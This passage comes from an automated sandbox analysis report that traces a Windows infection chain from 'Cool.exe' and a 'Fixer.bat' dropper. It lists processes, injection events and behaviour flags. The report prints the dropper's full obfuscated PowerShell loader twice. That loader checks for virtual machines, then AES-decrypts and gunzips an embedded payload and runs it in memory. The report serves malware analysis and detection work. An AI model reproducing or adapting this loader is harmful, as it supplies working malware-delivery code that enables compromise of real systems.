pid Process 3392 Explorer.EXE 3392 Explorer.EXE 3392 Explorer.EXE 3392 Explorer.EXE 3392 Explorer.EXE 3392 Explorer.EXE 3392 Explorer.EXE 3392 Explorer.EXE 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 3392 Explorer.EXE 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 3392 Explorer.EXE 3392 Explorer.EXE 3392 Explorer.EXE 3392 Explorer.EXE 3392 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5048 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1644 wrote to memory of 2404 1644 Cool.exe 82 PID 1644 wrote to memory of 2404 1644 Cool.exe 82 PID 2404 wrote to memory of 3584 2404 cmd.exe 84 PID 2404 wrote to memory of 3584 2404 cmd.exe 84 PID 2404 wrote to memory of 1320 2404 cmd.exe 85 PID 2404 wrote to memory of 1320 2404 cmd.exe 85 PID 2404 wrote to memory of 1508 2404 cmd.exe 86 PID 2404 wrote to memory of 1508 2404 cmd.exe 86 PID 2404 wrote to memory of 3872 2404 cmd.exe 87 PID 2404 wrote to memory of 3872 2404 cmd.exe 87 PID 2404 wrote to memory of 2856 2404 cmd.exe 88 PID 2404 wrote to memory of 2856 2404 cmd.exe 88 PID 2404 wrote to memory of 1516 2404 cmd.exe 89 PID 2404 wrote to memory of 1516 2404 cmd.exe 89 PID 1516 wrote to memory of 1780 1516 powershell.exe 94 PID 1516 wrote to memory of 1780 1516 powershell.exe 94 PID 1516 wrote to memory of 1780 1516 powershell.exe 94 PID 1516 wrote to memory of 1780 1516 powershell.exe 94 PID 1516 wrote to memory of 1780 1516 powershell.exe 94 PID 1516 wrote to memory of 1780 1516 powershell.exe 94 PID 1516 wrote to memory of 1780 1516 powershell.exe 94 PID 1516 wrote to memory of 1780 1516 powershell.exe 94 PID 1780 wrote to memory of 608 1780 dllhost.exe 5 PID 1780 wrote to memory of 672 1780 dllhost.exe 7 PID 1780 wrote to memory of 948 1780 dllhost.exe 12 PID 1780 wrote to memory of 60 1780 dllhost.exe 13 PID 1780 wrote to memory of 448 1780 dllhost.exe 14 PID 1780 wrote to memory of 688 1780 dllhost.exe 15 PID 1780 wrote to memory of 1008 1780 dllhost.exe 16 PID 1780 wrote to memory of 728 1780 dllhost.exe 17 PID 1780 wrote to memory of 1032 1780 dllhost.exe 18 PID 1780 wrote to memory of 1144 1780 dllhost.exe 20 PID 1780 wrote to memory of 1236 1780 dllhost.exe 21 PID 1780 wrote to memory of 1300 1780 dllhost.exe 22 PID 1780 wrote to memory of 1328 1780 dllhost.exe 23 PID 1780 wrote to memory of 1364 1780 dllhost.exe 24 PID 1780 wrote to memory of 1384 1780 dllhost.exe 25 PID 1780 wrote to memory of 1488 1780 dllhost.exe 26 PID 1780 wrote to memory of 1532 1780 dllhost.exe 27 PID 1780 wrote to memory of 1556 1780 dllhost.exe 28 PID 1780 wrote to memory of 1596 1780 dllhost.exe 29 PID 1780 wrote to memory of 1656 1780 dllhost.exe 30 PID 1780 wrote to memory of 1732 1780 dllhost.exe 31 PID 1780 wrote to memory of 1760 1780 dllhost.exe 32 PID 1780 wrote to memory of 1864 1780 dllhost.exe 33 PID 1780 wrote to memory of 1872 1780 dllhost.exe 34 PID 1780 wrote to memory of 1908 1780 dllhost.exe 35 PID 1780 wrote to memory of 1928 1780 dllhost.exe 36 PID 1780 wrote to memory of 1392 1780 dllhost.exe 37 PID 1780 wrote to memory of 2116 1780 dllhost.exe 39 PID 1780 wrote to memory of 2220 1780 dllhost.exe 40 PID 1780 wrote to memory of 2284 1780 dllhost.exe 41 PID 1780 wrote to memory of 2380 1780 dllhost.exe 42 PID 1780 wrote to memory of 2376 1780 dllhost.exe 43 PID 1780 wrote to memory of 2548 1780 dllhost.exe 44 PID 1780 wrote to memory of 2624 1780 dllhost.exe 45 PID 1780 wrote to memory of 2640 1780 dllhost.exe 46 PID 1780 wrote to memory of 2660 1780 dllhost.exe 47 PID 1780 wrote to memory of 2672 1780 dllhost.exe 48 PID 1780 wrote to memory of 2712 1780 dllhost.exe 49 PID 672 wrote to memory of 2640 672 lsass.exe 46 PID 1780 wrote to memory of 2756 1780 dllhost.exe 50 PID 1780 wrote to memory of 3060 1780 dllhost.exe 52 PID 1780 wrote to memory of 2396 1780 dllhost.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:608
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:60
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ccb21bba-98db-4d6f-a4eb-4bd9c0a79447}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1780
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{67a2d645-8e66-483f-9492-a5af8fee2447}2⤵PID:1896
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:448
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1008 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3060
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1144
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1236
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1300
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
PID:2712
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1364
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1556
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1596
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1656
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1760
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1864
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1872
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1908
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1928
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1392
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2116
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2376
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2548
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2624
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2640
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2756
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2596
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3364
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3392 -
C:\Users\Admin\AppData\Local\Temp\Cool.exe"C:\Users\Admin\AppData\Local\Temp\Cool.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Fixer.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1992
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives4⤵PID:3584
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"4⤵PID:1320
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives4⤵PID:1508
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"4⤵PID:3872
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function FlUs($RtYx){ Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose '$Olib=[NPSNPyNPsNPtNPeNPm.NPSNPeNPcNPuNPrNPitNPyNP.NPCrNPyNPpNPtNPoNPgNPrNPaNPpNPhNPyNP.ANPeNPsNP]NP:NP:NPCNPreNPaNPtNPe(NP);'.Replace('NP', ''); Invoke-Expression -WarningAction Inquire -Verbose -InformationAction Ignore -Debug '$Olib.MfOofOdfOefO=fO[fOSyfOsfOtfOefOmfO.fOSefOcfOufOrifOtfOyfO.fOCfOrfOyfOpfOtfOofOgfOrafOpfOhfOyfO.fOCfOifOphfOefOrfOMofOdefO]fO:fO:fOCfOBfOC;'.Replace('fO', ''); Invoke-Expression -WarningAction Inquire -Verbose -Debug '$Olib.PbGabGdbGdbGibGnbGg=bG[bGSbGybGsbGtbGembG.bGSbGecbGubGrbGibGtbGybG.bGCbGrbGybGpbGtobGgbGrbGabGpbGhbGybG.PbGabGdbGdibGngbGMbGobGdbGebG]bG::bGPbGKbGCbGSbG7;'.Replace('bG', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Debug -Verbose '$Olib.Ktpetpytp=tp[tpStpystpttpetpmtp.tpCtpontpvtpetprttp]tp:tp:tpFtprtpotpmtpBtpatpstpe6tp4tpStpttprtpitpntpg("NtpAtpZtpNtpHtp6tprDtpltpltpStpztpZtp31tpttpytpHOtpdtpptpltpjtpTtpItpptpHtpqtpNtpcAtp2tpltpOtpPtpKtpktpQXtpwtp/tpFctp=");'.Replace('tp', ''); Invoke-Expression -WarningAction Inquire '$Olib.IULVUL=UL[ULSULyULstULeULmUL.ULCULoULnvULeULrULt]UL:UL:ULFULrULoULmULBULaULsULeUL64ULSULtULrULiULnULg("tULOULZULkUL0ULHULCZULUULIULOUL0ULVULpIULgULgUL/GUL5UL8ULwUL=UL=UL");'.Replace('UL', ''); $Xiel=$Olib.CreateDecryptor(); $khkv=$Xiel.TransformFinalBlock($RtYx, 0, $RtYx.Length); $Xiel.Dispose(); $Olib.Dispose(); $khkv;}function nndR($RtYx){ Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire '$kFvs=NJceJcwJc-JcOJcbJcjeJccJctJc JcSJcyJcstJceJcmJc.IJcOJc.JcMJceJcmJcoJcrJcyJcSJctJcreJcaJcmJc(,$RtYx);'.Replace('Jc', ''); Invoke-Expression -WarningAction Inquire '$zfZZ=NJceJcwJc-JcOJcbJcjeJccJctJc JcSJcyJcstJceJcmJc.IJcOJc.JcMJceJcmJcoJcrJcyJcSJctJcreJcaJcmJc;'.Replace('Jc', ''); Invoke-Expression -Debug '$nYxJ=NVqeVqwVq-VqOVqbVqjeVqcVqtVq VqSVqyVqstVqeVqmVq.IVqOVq.VqCVqoVqmVqpVqrVqeVqsVqsVqioVqnVq.VqGVqZVqiVqpVqStVqrVqeVqamVq($kFvs, [VqIVqOVq.VqCVqoVqmpVqrVqeVqsVqsVqiVqonVq.VqCVqomVqpVqrVqeVqsVqsVqiVqoVqnVqMVqoVqdeVq]Vq:Vq:VqDVqeVqcVqomVqpVqrVqesVqs);'.Replace('Vq', ''); $nYxJ.CopyTo($zfZZ); $nYxJ.Dispose(); $kFvs.Dispose(); $zfZZ.Dispose(); $zfZZ.ToArray();}function csqF($RtYx,$tura){ Invoke-Expression -InformationAction Ignore '$oOIa=[iaSiayiasiatiaeiam.iaRiaeiafialiaeiactiaiiaoian.iaAiasiasiaeiamiabialiayia]ia:ia:Liaoiaaiadia([byte[]]$RtYx);'.Replace('ia', ''); Invoke-Expression -Debug -Verbose '$LDvh=$oOIa.EnInnItnIrnIynIPnIoinInnItnI;'.Replace('nI', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose -Debug '$LDvh.KUIKUnKUvKUoKUkKUe(KU$KUnKUuKUlKUl, $tura);'.Replace('KU', '');}$tKua = 'C:\Users\Admin\AppData\Roaming\Fixer.bat';$host.UI.RawUI.WindowTitle = $tKua;$FQFy=[System.IO.File]::ReadAllText($tKua).Split([Environment]::NewLine);foreach ($Szce in $FQFy) { if ($Szce.StartsWith('hfEMc')) { $SPWC=$Szce.Substring(5); break; }}$UbZi=[string[]]$SPWC.Split('\');Invoke-Expression -InformationAction Ignore -Verbose -Debug -WarningAction Inquire '$cVz = nndR (FlUs ([auCauoaunauvaueaurtau]au:au:auFaurauomauBauaauseau6au4auSautaurauiaunaugau($UbZi[0].Replace("#", "/").Replace("@", "A"))));'.Replace('au', '');Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore '$Noc = nndR (FlUs ([auCauoaunauvaueaurtau]au:au:auFaurauomauBauaauseau6au4auSautaurauiaunaugau($UbZi[1].Replace("#", "/").Replace("@", "A"))));'.Replace('au', '');Invoke-Expression -Verbose -WarningAction Inquire -Debug -InformationAction Ignore '$AAQ = nndR (FlUs ([auCauoaunauvaueaurtau]au:au:auFaurauomauBauaauseau6au4auSautaurauiaunaugau($UbZi[2].Replace("#", "/").Replace("@", "A"))));'.Replace('au', '');csqF $cVz $null;csqF $Noc $null;csqF $AAQ (,[string[]] (''));4⤵PID:2856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1516 -s 16245⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4416
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Roaming\Fixer.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat5⤵
- Drops file in Windows directory
PID:1904 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "5⤵PID:3660
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1828
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives6⤵PID:3436
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"6⤵PID:2508
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives6⤵PID:4840
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"6⤵PID:1040
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function FlUs($RtYx){ Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose '$Olib=[NPSNPyNPsNPtNPeNPm.NPSNPeNPcNPuNPrNPitNPyNP.NPCrNPyNPpNPtNPoNPgNPrNPaNPpNPhNPyNP.ANPeNPsNP]NP:NP:NPCNPreNPaNPtNPe(NP);'.Replace('NP', ''); Invoke-Expression -WarningAction Inquire -Verbose -InformationAction Ignore -Debug '$Olib.MfOofOdfOefO=fO[fOSyfOsfOtfOefOmfO.fOSefOcfOufOrifOtfOyfO.fOCfOrfOyfOpfOtfOofOgfOrafOpfOhfOyfO.fOCfOifOphfOefOrfOMofOdefO]fO:fO:fOCfOBfOC;'.Replace('fO', ''); Invoke-Expression -WarningAction Inquire -Verbose -Debug '$Olib.PbGabGdbGdbGibGnbGg=bG[bGSbGybGsbGtbGembG.bGSbGecbGubGrbGibGtbGybG.bGCbGrbGybGpbGtobGgbGrbGabGpbGhbGybG.PbGabGdbGdibGngbGMbGobGdbGebG]bG::bGPbGKbGCbGSbG7;'.Replace('bG', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Debug -Verbose '$Olib.Ktpetpytp=tp[tpStpystpttpetpmtp.tpCtpontpvtpetprttp]tp:tp:tpFtprtpotpmtpBtpatpstpe6tp4tpStpttprtpitpntpg("NtpAtpZtpNtpHtp6tprDtpltpltpStpztpZtp31tpttpytpHOtpdtpptpltpjtpTtpItpptpHtpqtpNtpcAtp2tpltpOtpPtpKtpktpQXtpwtp/tpFctp=");'.Replace('tp', ''); Invoke-Expression -WarningAction Inquire '$Olib.IULVUL=UL[ULSULyULstULeULmUL.ULCULoULnvULeULrULt]UL:UL:ULFULrULoULmULBULaULsULeUL64ULSULtULrULiULnULg("tULOULZULkUL0ULHULCZULUULIULOUL0ULVULpIULgULgUL/GUL5UL8ULwUL=UL=UL");'.Replace('UL', ''); $Xiel=$Olib.CreateDecryptor(); $khkv=$Xiel.TransformFinalBlock($RtYx, 0, $RtYx.Length); $Xiel.Dispose(); $Olib.Dispose(); $khkv;}function nndR($RtYx){ Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire '$kFvs=NJceJcwJc-JcOJcbJcjeJccJctJc JcSJcyJcstJceJcmJc.IJcOJc.JcMJceJcmJcoJcrJcyJcSJctJcreJcaJcmJc(,$RtYx);'.Replace('Jc', ''); Invoke-Expression -WarningAction Inquire '$zfZZ=NJceJcwJc-JcOJcbJcjeJccJctJc JcSJcyJcstJceJcmJc.IJcOJc.JcMJceJcmJcoJcrJcyJcSJctJcreJcaJcmJc;'.Replace('Jc', ''); Invoke-Expression -Debug '$nYxJ=NVqeVqwVq-VqOVqbVqjeVqcVqtVq VqSVqyVqstVqeVqmVq.IVqOVq.VqCVqoVqmVqpVqrVqeVqsVqsVqioVqnVq.VqGVqZVqiVqpVqStVqrVqeVqamVq($kFvs, [VqIVqOVq.VqCVqoVqmpVqrVqeVqsVqsVqiVqonVq.VqCVqomVqpVqrVqeVqsVqsVqiVqoVqnVqMVqoVqdeVq]Vq:Vq:VqDVqeVqcVqomVqpVqrVqesVqs);'.Replace('Vq', ''); $nYxJ.CopyTo($zfZZ); $nYxJ.Dispose(); $kFvs.Dispose(); $zfZZ.Dispose(); $zfZZ.ToArray();}function csqF($RtYx,$tura){ Invoke-Expression -InformationAction Ignore '$oOIa=[iaSiayiasiatiaeiam.iaRiaeiafialiaeiactiaiiaoian.iaAiasiasiaeiamiabialiayia]ia:ia:Liaoiaaiadia([byte[]]$RtYx);'.Replace('ia', ''); Invoke-Expression -Debug -Verbose '$LDvh=$oOIa.EnInnItnIrnIynIPnIoinInnItnI;'.Replace('nI', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose -Debug '$LDvh.KUIKUnKUvKUoKUkKUe(KU$KUnKUuKUlKUl, $tura);'.Replace('KU', '');}$tKua = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tKua;$FQFy=[System.IO.File]::ReadAllText($tKua).Split([Environment]::NewLine);foreach ($Szce in $FQFy) { if ($Szce.StartsWith('hfEMc')) { $SPWC=$Szce.Substring(5); break; }}$UbZi=[string[]]$SPWC.Split('\');Invoke-Expression -InformationAction Ignore -Verbose -Debug -WarningAction Inquire '$cVz = nndR (FlUs ([auCauoaunauvaueaurtau]au:au:auFaurauomauBauaauseau6au4auSautaurauiaunaugau($UbZi[0].Replace("#", "/").Replace("@", "A"))));'.Replace('au', '');Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore '$Noc = nndR (FlUs ([auCauoaunauvaueaurtau]au:au:auFaurauomauBauaauseau6au4auSautaurauiaunaugau($UbZi[1].Replace("#", "/").Replace("@", "A"))));'.Replace('au', '');Invoke-Expression -Verbose -WarningAction Inquire -Debug -InformationAction Ignore '$AAQ = nndR (FlUs ([auCauoaunauvaueaurtau]au:au:auFaurauomauBauaauseau6au4auSautaurauiaunaugau($UbZi[2].Replace("#", "/").Replace("@", "A"))));'.Replace('au', '');csqF $cVz $null;csqF $Noc $null;csqF $AAQ (,[string[]] (''));6⤵PID:2792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:5048 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5048 -s 21247⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2460
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5048 -s 26727⤵PID:1044
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F7⤵PID:3712
-
-
-
-
-
-
-
C:\Windows\$nya-onimai2\kAffre.exe"C:\Windows\$nya-onimai2\kAffre.exe"2⤵
- Executes dropped EXE
PID:3036 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1372
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1092 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x148,0x14c,0x150,0x124,0x154,0x7ffeea9446f8,0x7ffeea944708,0x7ffeea9447183⤵PID:3924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1948 /prefetch:23⤵PID:4136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2544 /prefetch:33⤵PID:2592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:83⤵PID:3260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:13⤵PID:4784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:13⤵PID:376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:13⤵PID:5344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:13⤵PID:5356
-
-
